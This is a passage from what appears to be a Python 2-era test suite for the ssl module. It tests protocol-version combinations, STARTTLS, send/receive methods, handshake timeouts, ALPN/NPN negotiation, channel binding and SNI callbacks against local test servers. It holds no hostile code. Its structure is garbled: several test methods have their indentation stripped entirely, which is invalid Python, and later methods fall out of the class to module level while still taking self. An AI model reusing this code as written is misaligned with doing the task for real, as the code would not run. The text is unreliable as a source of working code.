        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
        if no_sslv2_implies_sslv3_hello():
            # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
            try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
                               False, client_options=ssl.OP_NO_SSLv2)
    @skip_if_broken_ubuntu_ssl
    def test_protocol_tlsv1(self):
        """Connecting to a TLSv1 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        # Only TLSv1 clients should succeed against a TLSv1 server.
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_TLSv1)
    @skip_if_broken_ubuntu_ssl
    @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
                         "TLS version 1.1 not supported.")
    def test_protocol_tlsv1_1(self):
        """Connecting to a TLSv1.1 server with various client options.
           Testing against older TLS versions."""
        if support.verbose:
            sys.stdout.write("\n")
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_TLSv1_1)
        # Auto-negotiating clients reach TLSv1.1; version mixing between
        # TLSv1 and TLSv1.1 must fail in both directions.
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
    @skip_if_broken_ubuntu_ssl
    @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
                         "TLS version 1.2 not supported.")
    def test_protocol_tlsv1_2(self):
        """Connecting to a TLSv1.2 server with various client options.
           Testing against older TLS versions."""
        if support.verbose:
            sys.stdout.write("\n")
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
                           server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
                           client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_TLSv1_2)
        # Auto-negotiating clients reach TLSv1.2; mixing fixed TLS
        # versions must fail in both directions.
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
    def test_starttls(self):
        """Switching from clear text to encrypted and back again."""
        # The server treats "STARTTLS"/"ENDTLS" as mode switches; the
        # other messages are echoed in whichever mode is active.
        msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")

        server = ThreadedEchoServer(CERTFILE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    starttls_server=True,
                                    chatty=True,
                                    connectionchatty=True)
        # 'wrapped' tracks whether we are currently talking TLS (via
        # 'conn') or plain text (via 's').
        wrapped = False
        with server:
            s = socket.socket()
            s.setblocking(1)
            s.connect((HOST, server.port))
            if support.verbose:
                sys.stdout.write("\n")
            for indata in msgs:
                if support.verbose:
                    sys.stdout.write(
                        " client:  sending %r...\n" % indata)
                if wrapped:
                    conn.write(indata)
                    outdata = conn.read()
                else:
                    s.send(indata)
                    outdata = s.recv(1024)
                msg = outdata.strip().lower()
                if indata == b"STARTTLS" and msg.startswith(b"ok"):
                    # STARTTLS ok, switch to secure mode
                    if support.verbose:
                        sys.stdout.write(
                            " client:  read %r from server, starting TLS...\n"
                            % msg)
                    conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    wrapped = True
                elif indata == b"ENDTLS" and msg.startswith(b"ok"):
                    # ENDTLS ok, switch back to clear text
                    if support.verbose:
                        sys.stdout.write(
                            " client:  read %r from server, ending TLS...\n"
                            % msg)
                    s = conn.unwrap()
                    wrapped = False
                else:
                    if support.verbose:
                        sys.stdout.write(
                            " client:  read %r from server\n" % msg)
            if support.verbose:
                sys.stdout.write(" client:  closing connection.\n")
            # Tell the server we're done, on whichever channel is live.
            if wrapped:
                conn.write(b"over\n")
            else:
                s.send(b"over\n")
        if wrapped:
            conn.close()
        else:
            s.close()
    def test_socketserver(self):
        """Using a SocketServer to create and manage SSL connections."""
        server = make_https_server(self, certfile=CERTFILE)
        # try to connect
        if support.verbose:
            sys.stdout.write('\n')
        # The HTTPS server serves its own cert file; fetching it over
        # TLS must yield bytes identical to the file on disk.
        with open(CERTFILE, 'rb') as f:
            d1 = f.read()
        d2 = ''
        # now fetch the same data from the HTTPS server
        url = 'https://localhost:%d/%s' % (
            server.port, os.path.split(CERTFILE)[1])
        context = ssl.create_default_context(cafile=CERTFILE)
        f = urllib2.urlopen(url, context=context)
        try:
            dlen = f.info().getheader("content-length")
            if dlen and (int(dlen) > 0):
                d2 = f.read(int(dlen))
                if support.verbose:
                    sys.stdout.write(
                        " client: read %d bytes from remote server '%s'\n"
                        % (len(d2), server))
        finally:
            f.close()
        self.assertEqual(d1, d2)
    def test_asyncore_server(self):
        """Check the example asyncore integration."""
        if support.verbose:
            sys.stdout.write("\n")
        indata = b"FOO\n"
        server = AsyncoreEchoServer(CERTFILE)
        with server:
            s = ssl.wrap_socket(socket.socket())
            s.connect(('127.0.0.1', server.port))
            if support.verbose:
                sys.stdout.write(
                    " client:  sending %r...\n" % indata)
            s.write(indata)
            outdata = s.read()
            if support.verbose:
                sys.stdout.write(" client:  read %r\n" % outdata)
            # The asyncore echo server lowercases what it receives.
            if outdata != indata.lower():
                self.fail(
                    "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                    % (outdata[:20], len(outdata),
                       indata[:20].lower(), len(indata)))
            s.write(b"over\n")
            if support.verbose:
                sys.stdout.write(" client:  closing connection.\n")
            s.close()
            if support.verbose:
                sys.stdout.write(" client:  connection closed.\n")
    def test_recv_send(self):
        """Test recv(), send() and friends.

        Runs every send*/recv* variant against the echo server: the
        stream-oriented ones must round-trip data, the datagram-style
        ones (sendto, recvfrom, recvfrom_into) must raise ValueError on
        an SSL socket.  Finishes with edge cases: read(-1, buffer),
        dup(), and negative sizes.
        """
        if support.verbose:
            sys.stdout.write("\n")

        server = ThreadedEchoServer(CERTFILE,
                                    certreqs=ssl.CERT_NONE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    cacerts=CERTFILE,
                                    chatty=True,
                                    connectionchatty=False)
        with server:
            s = ssl.wrap_socket(socket.socket(),
                                server_side=False,
                                certfile=CERTFILE,
                                ca_certs=CERTFILE,
                                cert_reqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLSv1)
            s.connect((HOST, server.port))
            # helper methods for standardising recv* method signatures
            def _recv_into():
                b = bytearray(b"\0"*100)
                count = s.recv_into(b)
                return b[:count]

            def _recvfrom_into():
                b = bytearray(b"\0"*100)
                count, addr = s.recvfrom_into(b)
                return b[:count]

            # (name, method, whether to expect success, *args)
            send_methods = [
                ('send', s.send, True, []),
                ('sendto', s.sendto, False, ["some.address"]),
                ('sendall', s.sendall, True, []),
            ]
            recv_methods = [
                ('recv', s.recv, True, []),
                ('recvfrom', s.recvfrom, False, ["some.address"]),
                ('recv_into', _recv_into, True, []),
                ('recvfrom_into', _recvfrom_into, False, []),
            ]
            data_prefix = u"PREFIX_"

            for meth_name, send_meth, expect_success, args in send_methods:
                # Unique payload per method so mix-ups are detectable.
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    send_meth(indata, *args)
                    outdata = s.read()
                    if outdata != indata.lower():
                        self.fail(
                            "While sending with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to send with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    # The error message must name the offending method.
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )

            for meth_name, recv_meth, expect_success, args in recv_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    s.send(indata)
                    outdata = recv_meth(*args)
                    if outdata != indata.lower():
                        self.fail(
                            "While receiving with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to receive with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
                    # consume data
                    s.read()

            # read(-1, buffer) is supported, even though read(-1) is not
            data = b"data"
            s.send(data)
            buffer = bytearray(len(data))
            self.assertEqual(s.read(-1, buffer), len(data))
            self.assertEqual(buffer, data)

            self.assertRaises(NotImplementedError, s.dup)
            s.write(b"over\n")
            self.assertRaises(ValueError, s.recv, -1)
            self.assertRaises(ValueError, s.read, -1)
            s.close()
    def test_recv_zero(self):
        """recv(0)/read(0) return b"" immediately, even non-blocking."""
        server = ThreadedEchoServer(CERTFILE)
        # Enter the server manually so cleanup runs even on failure.
        server.__enter__()
        self.addCleanup(server.__exit__, None, None)
        s = socket.create_connection((HOST, server.port))
        self.addCleanup(s.close)
        s = ssl.wrap_socket(s, suppress_ragged_eofs=False)
        self.addCleanup(s.close)

        # recv/read(0) should return no data
        s.send(b"data")
        self.assertEqual(s.recv(0), b"")
        self.assertEqual(s.read(0), b"")
        self.assertEqual(s.read(), b"data")

        # Should not block if the other end sends no data
        s.setblocking(False)
        self.assertEqual(s.recv(0), b"")
        self.assertEqual(s.recv_into(bytearray()), 0)
    def test_handshake_timeout(self):
        # Issue #5103: SSL handshake must respect the socket timeout
        """The SSL handshake must respect the socket timeout (issue #5103).

        The server thread accepts TCP connections but never speaks TLS,
        so the client's handshake can only end by timing out.
        """
        server = socket.socket(socket.AF_INET)
        host = "127.0.0.1"
        port = support.bind_port(server)
        started = threading.Event()
        finish = False

        def serve():
            server.listen(5)
            started.set()
            conns = []
            while not finish:
                r, w, e = select.select([server], [], [], 0.1)
                if server in r:
                    # Let the socket hang around rather than having
                    # it closed by garbage collection.
                    conns.append(server.accept()[0])
            for sock in conns:
                sock.close()

        t = threading.Thread(target=serve)
        t.start()
        started.wait()

        try:
            try:
                # Timeout set before wrapping: handshake happens inside
                # wrap_socket().
                c = socket.socket(socket.AF_INET)
                c.settimeout(0.2)
                c.connect((host, port))
                # Will attempt handshake and time out
                self.assertRaisesRegexp(ssl.SSLError, "timed out",
                                        ssl.wrap_socket, c)
            finally:
                c.close()
            try:
                # Timeout set after wrapping: handshake happens inside
                # connect().
                c = socket.socket(socket.AF_INET)
                c = ssl.wrap_socket(c)
                c.settimeout(0.2)
                # Will attempt handshake and time out
                self.assertRaisesRegexp(ssl.SSLError, "timed out",
                                        c.connect, (host, port))
            finally:
                c.close()
        finally:
            finish = True
            t.join()
            server.close()
    def test_server_accept(self):
        # Issue #16357: accept() on a SSLSocket created through
        # SSLContext.wrap_socket().
        """accept() on a server-side SSLSocket yields an SSLSocket."""
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(CERTFILE)
        context.load_cert_chain(CERTFILE)
        server = socket.socket(socket.AF_INET)
        host = "127.0.0.1"
        port = support.bind_port(server)
        server = context.wrap_socket(server, server_side=True)

        evt = threading.Event()
        # Mutable cells so the server thread can hand results back.
        remote = [None]
        peer = [None]
        def serve():
            server.listen(5)
            # Block on the accept and wait on the connection to close.
            evt.set()
            remote[0], peer[0] = server.accept()
            remote[0].send(remote[0].recv(4))

        t = threading.Thread(target=serve)
        t.start()
        # Client wait until server setup and perform a connect.
        evt.wait()
        client = context.wrap_socket(socket.socket())
        client.connect((host, port))
        client.send(b'data')
        client.recv()
        client_addr = client.getsockname()
        client.close()
        t.join()
        remote[0].close()
        server.close()
        # Sanity checks.
        self.assertIsInstance(remote[0], ssl.SSLSocket)
        self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
    def test_no_shared_ciphers(self):
        """Handshake fails cleanly when client and server share no cipher."""
        server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        server_context.load_cert_chain(SIGNED_CERTFILE)
        client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        client_context.verify_mode = ssl.CERT_REQUIRED
        client_context.check_hostname = True

        # OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
        client_context.options |= ssl.OP_NO_TLSv1_3
        # Force different suites on client and master
        client_context.set_ciphers("AES128")
        server_context.set_ciphers("AES256")
        with ThreadedEchoServer(context=server_context) as server:
            s = client_context.wrap_socket(
                socket.socket(),
                server_hostname="localhost")
            with self.assertRaises(ssl.SSLError):
                s.connect((HOST, server.port))
        # The server's recorded handshake error must explain the cause.
        self.assertIn("no shared cipher", str(server.conn_errors[0]))
    def test_version_basic(self):
        """
        Basic tests for SSLSocket.version().
        More tests are done in the test_protocol_*() methods.
        """
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with ThreadedEchoServer(CERTFILE,
                                ssl_version=ssl.PROTOCOL_TLSv1,
                                chatty=False) as server:
            with closing(context.wrap_socket(socket.socket())) as s:
                # version() is None before and after the connection.
                self.assertIs(s.version(), None)
                s.connect((HOST, server.port))
                self.assertEqual(s.version(), 'TLSv1')
            self.assertIs(s.version(), None)
    @unittest.skipUnless(ssl.HAS_TLSv1_3,
                         "test requires TLSv1.3 enabled OpenSSL")
    def test_tls1_3(self):
        """A TLS 1.3-only connection negotiates a TLS 1.3 cipher suite."""
        context = ssl.SSLContext(ssl.PROTOCOL_TLS)
        context.load_cert_chain(CERTFILE)
        # disable all but TLS 1.3
        context.options |= (
            ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
        )
        with ThreadedEchoServer(context=context) as server:
            s = context.wrap_socket(socket.socket())
            with closing(s):
                s.connect((HOST, server.port))
                # Only the three standard TLS 1.3 suites are possible.
                self.assertIn(s.cipher()[0], [
                    'TLS_AES_256_GCM_SHA384',
                    'TLS_CHACHA20_POLY1305_SHA256',
                    'TLS_AES_128_GCM_SHA256',
                ])
    @unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
    def test_default_ecdh_curve(self):
        # Issue #21015: elliptic curve-based Diffie Hellman key exchange
        # should be enabled by default on SSL contexts.
        """ECDH key exchange is enabled by default (issue #21015)."""
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.load_cert_chain(CERTFILE)
        # TLSv1.3 defaults to PFS key agreement and no longer has KEA in
        # cipher name.
        context.options |= ssl.OP_NO_TLSv1_3
        # Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
        # explicitly using the 'ECCdraft' cipher alias.  Otherwise,
        # our default cipher list should prefer ECDH-based ciphers
        # automatically.
        if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
            context.set_ciphers("ECCdraft:ECDH")
        with ThreadedEchoServer(context=context) as server:
            with closing(context.wrap_socket(socket.socket())) as s:
                s.connect((HOST, server.port))
                self.assertIn("ECDH", s.cipher()[0])
    @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                         "'tls-unique' channel binding not available")
    def test_tls_unique_channel_binding(self):
        """Test tls-unique channel binding.

        Checks that both endpoints agree on the binding data (the
        server echoes back a repr of its view) and that a second
        connection produces *different* binding data.
        """
        if support.verbose:
            sys.stdout.write("\n")

        server = ThreadedEchoServer(CERTFILE,
                                    certreqs=ssl.CERT_NONE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    cacerts=CERTFILE,
                                    chatty=True,
                                    connectionchatty=False)
        with server:
            s = ssl.wrap_socket(socket.socket(),
                                server_side=False,
                                certfile=CERTFILE,
                                ca_certs=CERTFILE,
                                cert_reqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLSv1)
            s.connect((HOST, server.port))
            # get the data
            cb_data = s.get_channel_binding("tls-unique")
            if support.verbose:
                sys.stdout.write(" got channel binding data: {0!r}\n"
                                 .format(cb_data))

            # check if it is sane
            self.assertIsNotNone(cb_data)
            self.assertEqual(len(cb_data), 12) # True for TLSv1

            # and compare with the peers version
            s.write(b"CB tls-unique\n")
            peer_data_repr = s.read().strip()
            self.assertEqual(peer_data_repr,
                             repr(cb_data).encode("us-ascii"))
            s.close()

            # now, again
            s = ssl.wrap_socket(socket.socket(),
                                server_side=False,
                                certfile=CERTFILE,
                                ca_certs=CERTFILE,
                                cert_reqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLSv1)
            s.connect((HOST, server.port))
            new_cb_data = s.get_channel_binding("tls-unique")
            if support.verbose:
                sys.stdout.write(" got another channel binding data: {0!r}\n"
                                 .format(new_cb_data))
            # is it really unique
            self.assertNotEqual(cb_data, new_cb_data)
            self.assertIsNotNone(cb_data)
            self.assertEqual(len(cb_data), 12) # True for TLSv1
            s.write(b"CB tls-unique\n")
            peer_data_repr = s.read().strip()
            self.assertEqual(peer_data_repr,
                             repr(new_cb_data).encode("us-ascii"))
            s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
    @unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
                         "ssl.OP_NO_COMPRESSION needed for this test")
    def test_compression_disabled(self):
        """OP_NO_COMPRESSION results in a connection with no compression."""
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.load_cert_chain(CERTFILE)
        context.options |= ssl.OP_NO_COMPRESSION
        stats = server_params_test(context, context,
                                   chatty=True, connectionchatty=True)
        self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
    def test_selected_alpn_protocol(self):
        # selected_alpn_protocol() is None unless ALPN is used.
        """selected_alpn_protocol() is None when neither side uses ALPN."""
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.load_cert_chain(CERTFILE)
        stats = server_params_test(context, context,
                                   chatty=True, connectionchatty=True)
        self.assertIs(stats['client_alpn_protocol'], None)
    @unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
    def test_selected_alpn_protocol_if_server_uses_alpn(self):
        # selected_alpn_protocol() is None unless ALPN is used by the client.
        """No ALPN result when only the server advertises protocols."""
        client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        client_context.load_verify_locations(CERTFILE)
        server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        server_context.load_cert_chain(CERTFILE)
        server_context.set_alpn_protocols(['foo', 'bar'])
        stats = server_params_test(client_context, server_context,
                                   chatty=True, connectionchatty=True)
        self.assertIs(stats['client_alpn_protocol'], None)
    @unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
    def test_alpn_protocols(self):
        """ALPN negotiation picks the server's preferred common protocol.

        Client and server must agree on the outcome; no overlap yields
        None (or, on OpenSSL 1.1.0 through 1.1.0e, a handshake error).
        """
        server_protocols = ['foo', 'bar', 'milkshake']
        # (client protocol list, expected negotiated protocol)
        protocol_tests = [
            (['foo', 'bar'], 'foo'),
            (['bar', 'foo'], 'foo'),
            (['milkshake'], 'milkshake'),
            (['http/3.0', 'http/4.0'], None)
        ]
        for client_protocols, expected in protocol_tests:
            server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
            server_context.load_cert_chain(CERTFILE)
            server_context.set_alpn_protocols(server_protocols)
            client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
            client_context.load_cert_chain(CERTFILE)
            client_context.set_alpn_protocols(client_protocols)

            try:
                stats = server_params_test(client_context,
                                           server_context,
                                           chatty=True,
                                           connectionchatty=True)
            except ssl.SSLError as e:
                stats = e

            if (expected is None and IS_OPENSSL_1_1
                    and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
                # OpenSSL 1.1.0 to 1.1.0e raises handshake error
                self.assertIsInstance(stats, ssl.SSLError)
            else:
                msg = "failed trying %s (s) and %s (c).\n" \
                      "was expecting %s, but got %%s from the %%s" \
                          % (str(server_protocols), str(client_protocols),
                             str(expected))
                client_result = stats['client_alpn_protocol']
                self.assertEqual(client_result, expected,
                                 msg % (client_result, "client"))
                server_result = stats['server_alpn_protocols'][-1] \
                    if len(stats['server_alpn_protocols']) else 'nothing'
                self.assertEqual(server_result, expected,
                                 msg % (server_result, "server"))
    def test_selected_npn_protocol(self):
        # selected_npn_protocol() is None unless NPN is used
        """selected_npn_protocol() is None when NPN is not negotiated."""
        context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        context.load_cert_chain(CERTFILE)
        stats = server_params_test(context, context,
                                   chatty=True, connectionchatty=True)
        self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
    """Exercise NPN negotiation for several client/server offer pairs."""
    server_protocols = ['http/1.1', 'spdy/2']
    cases = (
        (['http/1.1', 'spdy/2'], 'http/1.1'),
        (['spdy/2', 'http/1.1'], 'http/1.1'),
        (['spdy/2', 'test'], 'spdy/2'),
        (['abc', 'def'], 'abc'),
    )
    for client_protocols, expected in cases:
        srv_ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        srv_ctx.load_cert_chain(CERTFILE)
        srv_ctx.set_npn_protocols(server_protocols)
        cli_ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        cli_ctx.load_cert_chain(CERTFILE)
        cli_ctx.set_npn_protocols(client_protocols)
        stats = server_params_test(cli_ctx, srv_ctx,
                                   chatty=True, connectionchatty=True)
        msg = ("failed trying %s (s) and %s (c).\n"
               "was expecting %s, but got %%s from the %%s"
               % (str(server_protocols), str(client_protocols),
                  str(expected)))
        client_result = stats['client_npn_protocol']
        self.assertEqual(client_result, expected,
                         msg % (client_result, "client"))
        if len(stats['server_npn_protocols']):
            server_result = stats['server_npn_protocols'][-1]
        else:
            server_result = 'nothing'
        self.assertEqual(server_result, expected,
                         msg % (server_result, "server"))
def sni_contexts(self):
    """Build the (server, other, client) SSLContext triple for SNI tests.

    The server context serves SIGNED_CERTFILE, the alternate context
    serves SIGNED_CERTFILE2, and the client verifies against SIGNING_CA.
    """
    server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    server_context.load_cert_chain(SIGNED_CERTFILE)
    other_context.load_cert_chain(SIGNED_CERTFILE2)
    client_context.verify_mode = ssl.CERT_REQUIRED
    client_context.load_verify_locations(SIGNING_CA)
    return server_context, other_context, client_context
def check_common_name(self, stats, name):
    """Assert the peer certificate in *stats* carries commonName *name*."""
    subject = stats['peercert']['subject']
    self.assertIn((('commonName', name),), subject)
@needs_sni
def test_sni_callback(self):
    """Exercise SSLContext.set_servername_callback() end to end.

    Checks that the callback receives the SNI hostname (or None), that
    swapping ssl_sock.context inside the callback changes which
    certificate is served, and that passing None unregisters it.
    """
    calls = []
    server_context, other_context, client_context = self.sni_contexts()

    def servername_cb(ssl_sock, server_name, initial_context):
        calls.append((server_name, initial_context))
        if server_name is not None:
            # Serve the alternate certificate for named connections.
            ssl_sock.context = other_context
    server_context.set_servername_callback(servername_cb)

    stats = server_params_test(client_context, server_context,
                               chatty=True,
                               sni_name='supermessage')
    # The hostname was fetched properly, and the certificate was
    # changed for the connection.
    self.assertEqual(calls, [("supermessage", server_context)])
    # CERTFILE4 was selected
    self.check_common_name(stats, 'fakehostname')

    calls = []
    # The callback is called with server_name=None
    stats = server_params_test(client_context, server_context,
                               chatty=True,
                               sni_name=None)
    self.assertEqual(calls, [(None, server_context)])
    self.check_common_name(stats, 'localhost')

    # Check disabling the callback
    calls = []
    server_context.set_servername_callback(None)
    stats = server_params_test(client_context, server_context,
                               chatty=True,
                               sni_name='notfunny')
    # Certificate didn't change
    self.check_common_name(stats, 'localhost')
    self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
    """A TLS alert returned by the SNI callback reaches the client."""
    server_context, other_context, client_context = self.sni_contexts()

    def cb_returning_alert(ssl_sock, server_name, initial_context):
        return ssl.ALERT_DESCRIPTION_ACCESS_DENIED

    server_context.set_servername_callback(cb_returning_alert)
    with self.assertRaises(ssl.SSLError) as cm:
        server_params_test(client_context, server_context,
                           chatty=False, sni_name='supermessage')
    self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
    """An exception inside the SNI callback aborts the handshake with a
    handshake-failure alert and shows the traceback on stderr."""
    server_context, other_context, client_context = self.sni_contexts()

    def cb_raising(ssl_sock, server_name, initial_context):
        1.0/0.0  # deliberately raise ZeroDivisionError

    server_context.set_servername_callback(cb_raising)
    with self.assertRaises(ssl.SSLError) as cm, \
            support.captured_stderr() as stderr:
        server_params_test(client_context, server_context,
                           chatty=False, sni_name='supermessage')
    self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
    self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
    """A non-int return from the SNI callback terminates the connection
    with an internal-error alert and logs a TypeError."""
    server_context, other_context, client_context = self.sni_contexts()

    def cb_wrong_return_type(ssl_sock, server_name, initial_context):
        return "foo"

    server_context.set_servername_callback(cb_wrong_return_type)
